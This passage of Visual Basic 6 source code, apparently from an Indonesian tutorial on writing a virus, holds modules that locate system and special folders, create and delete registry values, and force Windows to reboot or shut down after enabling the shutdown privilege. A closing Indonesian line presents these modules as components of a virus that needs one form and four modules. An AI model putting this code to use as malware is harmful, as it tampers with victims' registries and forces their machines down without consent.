'create buffer
Path$ = Space$(512)
'Get path from IDList(IDL)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb,
ByVal Path$)
'Remove chr$(0)
GetSpecialfolder = Left$(Path, InStr(Path,
Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'Get System Path
Public Function GetSystemPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetSystemDirectory(Buffer, 255)
GetSystemPath = Left(Buffer, x) &
"\"
End Function
'Get Windows Path
Public Function GetWindowsPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetWindowsDirectory(Buffer, 255)
GetWindowsPath = Left(Buffer, x) &
"\"
End Function
Public Function Folder_Exist(ByVal
strFolder As String) As Boolean
Dim fso As Object
Set fso =
CreateObject("Scripting.FileSystemObject")
If InStr(1, Right$(strFolder, 5),
".") > 0 Then
strFolder =
fso.GetParentFolderName(strFolder)
End If
If fso.FolderExists(strFolder) Then
Folder_Exist = True
Else
Folder_Exist = False
End If
Set fso = Nothing
End Function
Module Racuni_Registry
'Registry API
Public Declare Function RegDeleteValue Lib
"advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long,
ByVal lpValueName As String) As Long
Public Declare Function RegDeleteKey Lib
"advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long,
ByVal lpSubKey As String) As Long
Public Declare Function RegOpenKey Lib
"advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long,
ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegCreateKey Lib
"advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long,
ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib
"advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long,
ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long,
lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the
lpData parameter as String, you must pass it By Value.
Public Declare Function RegCloseKey Lib
"advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegQueryValueEx Lib
"advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As
Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long,
lpData As Any, lpcbData As Long) As Long ' Note that if you declare the lpData
parameter as String, you must pass it By Value.
Public Declare Function RegSetValue Lib
"advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long,
ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal
cbData As Long) As Long
Public Const REG_DWORD = 4
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
'Create or Set Dword Value Registry
Public Function CreateDwordValue(hKey As
REG, Subkey As String, strValueName As String, dwordData As Long) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateDwordValue = RegSetValueEx(ret,
strValueName, 0, REG_DWORD, dwordData, 4)
RegCloseKey ret
End Function
Public Function CreateStringValue(hKey As
REG, Subkey As String, RTypeStringValue As TypeStringValue, strValueName As
String, strData As String) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret,
strValueName, 0, RTypeStringValue, ByVal strData, Len(strData))
RegCloseKey ret
End Function
Public Function DeleteValue(hKey As REG,
Subkey As String, lpValName As String) As Long
Dim ret As Long
On Error Resume Next
RegOpenKey hKey, Subkey, ret
DeleteValue = RegDeleteValue(ret,
lpValName)
RegCloseKey ret
End Function
Module Restart
Public Declare Function ExitWindowsEx Lib
"user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Declare Function OpenProcessToken
Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess
As Long, TokenHandle As Long) As Long
Public Declare Function
LookupPrivilegeValue Lib "advapi32" Alias
"LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName
As String, lpLuid As LUID) As Long
Public Declare Function
AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long,
ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal
BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long)
As Long
Public Declare Function GetCurrentProcess
Lib "kernel32" () As Long
Public Declare Function GetVersionEx Lib
"kernel32" Alias "GetVersionExA" (lpVersionInformation As
OSVERSIONINFO) As Long
Public Const EWX_FORCE = 4
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Const VER_PLATFORM_WIN32_NT = 2
Public Const ANYSIZE_ARRAY = 1
Public Const TOKEN_ADJUST_PRIVILEGES =
&H20
Public Const TOKEN_QUERY = &H8
Public Const SE_PRIVILEGE_ENABLED = &H2
Public Type LUID
LowPart As Long
HighPart As Long
End Type
Public Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As
LUID_AND_ATTRIBUTES
End Type
Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
'Reboot Windows(Not WinNT)
Public Function Reboot() As Long
'On Error Resume Next
LogOff = ExitWindowsEx(EWX_FORCE Or
EWX_REBOOT, 0)
End Function
'Shutdown Windows(Not WinNT)
Public Function Shutdown() As Long
'On Error Resume Next
LogOff = ExitWindowsEx(EWX_FORCE Or
EWX_SHUTDOWN, 0)
End Function
'Detection WinNT
Public Function IsWinNT() As Boolean
'On Error Resume Next
Dim myOS As OSVERSIONINFO
myOS.dwOSVersionInfoSize = Len(myOS)
GetVersionEx myOS
IsWinNT = (myOS.dwPlatformId =
VER_PLATFORM_WIN32_NT)
End Function
'For Get Privileges from Win NT
Public Sub EnableShutDown()
'On Error Resume Next
Dim hProc As Long
Dim hToken As Long
Dim mLUID As LUID
Dim mPriv As TOKEN_PRIVILEGES
Dim mNewPriv As TOKEN_PRIVILEGES
hProc = GetCurrentProcess()
OpenProcessToken hProc, TOKEN_ADJUST_PRIVILEGES
+ TOKEN_QUERY, hToken
LookupPrivilegeValue "",
"SeShutdownPrivilege", mLUID
mPriv.PrivilegeCount = 1
mPriv.Privileges(0).Attributes =
SE_PRIVILEGE_ENABLED
mPriv.Privileges(0).pLuid = mLUID
'Setting Privileges windows NT
AdjustTokenPrivileges hToken, False, mPriv,
4 + (12 * mPriv.PrivilegeCount), mNewPriv, 4 + (12 * mNewPriv.PrivilegeCount)
End Sub
' Reboot For WinNT
Public Sub RebootNT(Force As Boolean)
Dim Flags As Long
Flags = EWX_REBOOT
If Force Then Flags = Flags + EWX_FORCE
If IsWinNT Then EnableShutDown
ExitWindowsEx Flags, 0
End Sub
' Shutdown For WinNT
Public Sub ShutdownNT(Force As Boolean)
Dim Flags As Long
Flags = EWX_SHUTDOWN
If Force Then Flags = Flags + EWX_FORCE
If IsWinNT Then EnableShutDown
ExitWindowsEx Flags, 0
End Sub
Untuk virus ni anda membutuhkan 1 form dan
4 Module. Untuk lebih jelasnya silahkan anda lihat coding berikut ini: